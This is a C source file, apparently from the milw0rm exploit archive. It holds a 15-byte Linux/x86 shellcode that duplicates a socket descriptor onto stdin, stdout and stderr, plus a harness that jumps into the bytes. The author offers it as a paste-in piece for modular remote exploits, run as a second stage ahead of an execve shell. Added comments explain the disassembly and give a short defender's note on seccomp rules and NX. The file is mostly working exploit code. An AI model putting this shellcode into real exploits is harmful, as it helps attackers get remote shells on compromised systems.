/* dup2_loop-core.c by Charles Stevenson <core@bokeoa.com>
 *
 * I made this as a chunk you can paste in to make modular remote
 * exploits. I usually combine this with an execve as the second
 * stage of a read() jmp *%esp.
 */
/*
 * hellcode: 15 bytes of Linux/x86 machine code equivalent to
 *
 *     for (ecx = 0; ecx != 3; ecx++)
 *         dup2(ebx, ecx);
 *
 * Walking the per-line disassembly below:
 *   - ecx is zeroed and serves as both the loop counter and the second
 *     dup2() argument (the target descriptor).
 *   - ebx, the first dup2() argument, is copied from esi via push/pop.
 *     So the descriptor being duplicated is whatever esi holds on entry,
 *     not the literal 0 in the title comment; the file header says this
 *     runs as the second stage after a read(), so presumably the first
 *     stage leaves the descriptor in esi -- TODO confirm against the
 *     caller.
 *   - eax = 0x3f is __NR_dup2 on 32-bit Linux; int $0x80 makes the call.
 *     eax is reloaded on every iteration because the kernel returns the
 *     syscall result in eax.
 *   - inc / cmp $3,%cl / jne repeat the body for ecx = 0, 1, 2, i.e.
 *     stdin, stdout and stderr all end up aliased to ebx.
 *
 * None of the bytes is 0x00, which is why main() can measure the
 * sequence with strlen().
 *
 * Defender's note: a process issuing dup2() three times onto fds 0-2
 * right after a read() from a socket is a well-known post-exploitation
 * signature worth a seccomp or audit rule; executing these bytes at all
 * also requires the page they live in to be executable, which a
 * non-executable .data mapping (NX / W^X) denies.
 */
char hellcode[] = /* dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core */
"\x31\xc9"                       // xor    %ecx,%ecx
"\x56"                           // push   %esi
"\x5b"                           // pop    %ebx
// loop:
"\x6a\x3f"                       // push   $0x3f
"\x58"                           // pop    %eax
"\xcd\x80"                       // int    $0x80
"\x41"                           // inc    %ecx
"\x80\xf9\x03"                   // cmp    $0x3,%cl
"\x75\xf5"                       // jne    80483e8 <loop>
;
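/*
 * Test harness: prints the length of hellcode and then jumps into it.
 *
 * NOTE: this file has no #include lines, so printf() and strlen() are
 * implicitly declared; C99 and later reject that. <stdio.h> and
 * <string.h> are required for it to compile cleanly.
 *
 * Converting an object pointer to a function pointer is not defined by
 * ISO C; it relies on the flat-memory Linux/x86 ABI this code targets.
 * On toolchains/kernels that map .data non-executable (NX / W^X) the
 * call into hellcode raises SIGSEGV instead of running the bytes.
 *
 * Return: 0 if hellcode returns control (it normally does not; the loop
 * falls through to whatever follows the array in memory).
 */
int main(void)
{
  /* strlen() is valid here because the byte sequence contains no 0x00. */
  size_t len = strlen(hellcode);

  /* Explicit two-step cast: data pointer -> void * -> function pointer. */
  void (*shell)(void) = (void (*)(void))(void *)hellcode;

  /* strlen() returns size_t, so the specifier must be %zu; the original
   * %d was a format/argument type mismatch (undefined behavior). */
  printf("%zu byte dup2(0,0); dup2(0,1); dup2(0,2); linux/x86 by core\n",
         len);
  shell();
  return 0;
}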
// milw0rm.com [2005-11-09]



